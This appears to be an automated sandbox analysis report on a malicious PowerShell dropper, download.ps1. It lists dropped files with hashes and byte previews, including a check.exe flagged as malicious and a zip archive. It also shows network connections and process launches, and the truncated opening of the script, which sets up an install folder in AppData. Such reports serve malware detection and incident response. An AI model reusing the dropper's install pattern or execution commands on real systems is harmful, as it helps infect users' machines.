                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):709904
                                                                                                                                                                                                                                      Entropy (8bit):5.861739047785334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
                                                                                                                                                                                                                                      MD5:0902D299A2A487A7B0C2D75862B13640
                                                                                                                                                                                                                                      SHA1:04BCBD5A11861A03A0D323A8050A677C3A88BE13
                                                                                                                                                                                                                                      SHA-256:2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
                                                                                                                                                                                                                                      SHA-512:8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mfvovm3.gpb.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpuutqlm.urj.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnmpjm1p.i2e.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zazl3rte.vp1.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6222
                                                                                                                                                                                                                                      Entropy (8bit):3.698526484519463
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:FmOdyBCubU2K+lzukvhkvklCywan2xVeL2lzFSogZodRVeL2l/FSogZoJ1:4M6CLoskvhkvCCtnVeL2WHAVeL2CHS
                                                                                                                                                                                                                                      MD5:25B7C35FC8FEAA9D867A6FF4FE79FEB3
                                                                                                                                                                                                                                      SHA1:3195E2B099A41817818B40FA74A5B93177A8DF39
                                                                                                                                                                                                                                      SHA-256:56F5391958C28E448C618ECCDA9A1D4474149D7E1873061BD5432C38CE881AC7
                                                                                                                                                                                                                                      SHA-512:0F1A7BEB4E4598457CD012B1A8808D7CC859D9AC41013C626D207BB5E5AE27AF4848A6EEE97EFA2045A73ED7375322F2466C274DD06DC0ECA33104DDFEBCFA2C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:...................................FL..................F.".. ...d.......~.%kH..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....o..!kH..M..%kH......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.-....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.-..Roaming.@......DWSl.Y.-....C........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.-....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y.-....E.....................v L.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.-....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.-....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.-....q...........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JXSMBXZHG5O4YP6F5WM0.temp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6222
                                                                                                                                                                                                                                      Entropy (8bit):3.698526484519463
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:FmOdyBCubU2K+lzukvhkvklCywan2xVeL2lzFSogZodRVeL2l/FSogZoJ1:4M6CLoskvhkvCCtnVeL2WHAVeL2CHS
                                                                                                                                                                                                                                      MD5:25B7C35FC8FEAA9D867A6FF4FE79FEB3
                                                                                                                                                                                                                                      SHA1:3195E2B099A41817818B40FA74A5B93177A8DF39
                                                                                                                                                                                                                                      SHA-256:56F5391958C28E448C618ECCDA9A1D4474149D7E1873061BD5432C38CE881AC7
                                                                                                                                                                                                                                      SHA-512:0F1A7BEB4E4598457CD012B1A8808D7CC859D9AC41013C626D207BB5E5AE27AF4848A6EEE97EFA2045A73ED7375322F2466C274DD06DC0ECA33104DDFEBCFA2C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:...................................FL..................F.".. ...d.......~.%kH..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....o..!kH..M..%kH......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.-....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.-..Roaming.@......DWSl.Y.-....C........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.-....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y.-....E.....................v L.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.-....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.-....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.-....q...........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38734342
                                                                                                                                                                                                                                      Entropy (8bit):7.995836813060236
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:786432:R+gX4BMdhwzTQXR5FbPp6FcSS5U/LT2KzVyPVLBdebXMb8VH/zEa:TXGMK4XR3bLSCU/+6yPl3ebcBa
                                                                                                                                                                                                                                      MD5:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                      SHA1:0E8926AF0ED2D77F193775E682F0A17B7E11B9A1
                                                                                                                                                                                                                                      SHA-256:BE4BEE2FEDE8B2FAC9D205B935AE47505B5168F675650F520BBE444A2E30F75F
                                                                                                                                                                                                                                      SHA-512:C2B518335A1458DB3A94B02CAD0814611F68F2516048F321CD182C831009021350FDBE08D5FEB70EC7C5032427E89FAFA3CF42526DC01D380DB57165E12FD307
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d... GQg.........."....).....\.................@......................................O...`.................................................\...x....p.......@..P"...........p..d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d....p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\wimnVRrV.zip

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38465733
                                                                                                                                                                                                                                      Entropy (8bit):7.998255215093817
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:786432:vwUDDc8/7rfgCeSLeWcabNMCssC5IcKp5chaRZqQeedp/1HgytX8PKSQu:pDdPISCNa+1sMIcqcgRwQ7b/1H/t0Qu
                                                                                                                                                                                                                                      MD5:B3FD01FF7DB8CB2BECFA3D9A89DD9C19
                                                                                                                                                                                                                                      SHA1:2B11272D4FBB67C2EA9321FE1C161B69E9203F95
                                                                                                                                                                                                                                      SHA-256:572EDC3BCC2DD32CB200C7247310FA2DF37F2C9ADF7AE1C3E39252A29A4B3095
                                                                                                                                                                                                                                      SHA-512:73CAFAF71A1F9AFB2B93446BFD056DB0E0E9680FEF36D033DEB5D5C9E4CF9FB7AACB50C38790FCBB5BB5B7C36DD76CE0B18F7FDE3E0FC58939BDCF06A88BB6AB
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:PK........@%.Y>..f-.J...O.....check.exe.]{`.W...TJbB..5H5D..m4.../:!...4.j.j...V....c.`...]}IhU...,mQ-.."(Z...s...D..........;.{...d..os.l.:....l%6....._5.5h....w.*..w..0.......}`.G.9..{4..~...q......w?....;...K.e..m....:..7*.r.......?/d..u.sh;~^.n....i....`\8.....}....\.N...d<.=.3....g...F....u........A;.R..6...j...'Yb......I.........a..!..:..o.X....c.m....ck...V..:.0>.6...Y...e.].$E..U...:......J.^.8X!N{-..f..q..Q.Q..v.i..k..q....f....q.@...+.8^..Z.j#.8.R...r..y2.....u~.w..G..]W...MJ\........J.X..:a....ub..V......@P.........l.....Z........................A.....WO..UB....[..k.Z...|.....d...#Jai^|FhP#%...0m.6[e+.O.T.gJ..\Hf..n..a........m..>..........P.N.`...s..m `~.(.}..-Z..n........s...!.....y.d...}..9E.9.U.H.R46qd...Rx0.^BU...k..u.,..M...3...;}.z!.;.u.v.i..j.....O.$....+.............m.m......'(..2....B..n.!;5E...PQ.%...5.8...........vo.v.mfN..:.v..6...OUP).@..O..?p.`....fC..L...~..X...<=..J. .^G.\....5I....Dt.Z.zJK.')X..

                                                                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                      Entropy (8bit):4.421598146389321
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:LSvfpi6ceLP/9skLmb0OTaWSPHaJG8nAgeMZMMhA2fX4WABlEnNk0uhiTw:2vloTaW+EZMM6DFyy03w
                                                                                                                                                                                                                                      MD5:367AB8153411EC5AEC0E12658856D401
                                                                                                                                                                                                                                      SHA1:0FDC70308829C9F65810B7D0DD2BB7AEBFFBD715
                                                                                                                                                                                                                                      SHA-256:29852648BDF09036F924EA5553FAE19346D3F5DFE91EE66F296520541C6CCD10
                                                                                                                                                                                                                                      SHA-512:715C6468970293D7FED3C7AF2FA5BBA637A432462881E0B7457109B1A47AF4D6C538643FFBF83F5B3FBAA330356B8F2EB051203538436242A178DB1A9C3E86D6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..;kH..............................................................................................................................................................................................................................................................................................................................................."..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      File type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                      Entropy (8bit):5.998968435407651
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                        File name:download.ps1
                                                                                                                                                                                                                                        File size:51'289'381 bytes
                                                                                                                                                                                                                                        MD5:aa53e9e42c8f90023dc846e2cb391fc0
                                                                                                                                                                                                                                        SHA1:7508cfcd899cfe941a85d085d847b74958a93bce
                                                                                                                                                                                                                                        SHA256:4af7ee1bbb06bf40d82f8d6c50d8624caeebd2e61fb2af97d9f8d5fe35c0d3ed
                                                                                                                                                                                                                                        SHA512:f852b3bb667cb21c6d3679cf2c188dfb285978e9c7fb1aa658988a0aec979dcfe7887ac9f88976c8a34346b91b6a259997122832890f0395a89b7838aa5d6383
                                                                                                                                                                                                                                        SSDEEP:49152:RrYBxTqVwuVJDPYNDnfOKjbKbH65eXId9YUOTf35/B5WvkskecJ72ecOrukSd5Wu:I
                                                                                                                                                                                                                                        TLSH:41B73320AF6A6DBA0A7CC239607F6F1D1BB00F95884CE5EB57E578C7025FB81451B878
                                                                                                                                                                                                                                        File Content Preview:${random_error_action_preference}="Stop";Set-Location $Env:AppData;${random_install_path}="$Env:AppData\UvDdFNOw";if(Test-Path ${random_install_path}){if(Test-Path "$Env:AppData\IJWVosrT.txt"){Remove-Item "$Env:AppData\IJWVosrT.txt"};Exit};$domain=(Get-Wm

                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                        Icon Hash:3270d6baae77db44

                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:30.858468056 CET49737443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:30.858486891 CET44349737104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:30.858644962 CET49737443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:30.861156940 CET49737443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:30.861171007 CET44349737104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:32.081808090 CET44349737104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:32.082432032 CET49737443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:32.082452059 CET44349737104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:32.083492994 CET44349737104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:32.083556890 CET49737443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:32.085628986 CET49737443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:32.085774899 CET44349737104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:32.085827112 CET49737443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:32.085922003 CET49737443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:43.912983894 CET49771443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:43.913006067 CET44349771104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:43.913080931 CET49771443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:43.914036989 CET49771443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:43.914052010 CET44349771104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:45.130753994 CET44349771104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:45.134155035 CET49771443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:45.134170055 CET44349771104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:45.135202885 CET44349771104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:45.135261059 CET49771443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:45.136718035 CET49771443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:45.136862993 CET44349771104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:45.136909008 CET49771443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:45.136964083 CET49771443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:53.251857042 CET49795443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:53.251883030 CET44349795104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:53.252053022 CET49795443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:53.252918959 CET49795443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:53.252932072 CET44349795104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:54.469799995 CET44349795104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:54.474525928 CET49795443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:54.474541903 CET44349795104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:54.475584984 CET44349795104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:54.475660086 CET49795443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:54.477005959 CET49795443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:54.477143049 CET44349795104.20.23.46192.168.2.5
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:54.477150917 CET49795443192.168.2.5104.20.23.46
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:54.477190971 CET49795443192.168.2.5104.20.23.46

                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:30.714891911 CET6424053192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:30.852531910 CET53642401.1.1.1192.168.2.5

                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:30.714891911 CET192.168.2.51.1.1.10x918Standard query (0)nodejs.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:30.852531910 CET1.1.1.1192.168.2.50x918No error (0)nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 7, 2024 06:45:30.852531910 CET1.1.1.1192.168.2.50x918No error (0)nodejs.org104.20.22.46A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:00:44:56
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:00:44:56
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:00:45:14
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7124f0000
                                                                                                                                                                                                                                        File size:38'734'342 bytes
                                                                                                                                                                                                                                        MD5 hash:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:00:45:21
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7124f0000
                                                                                                                                                                                                                                        File size:38'734'342 bytes
                                                                                                                                                                                                                                        MD5 hash:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

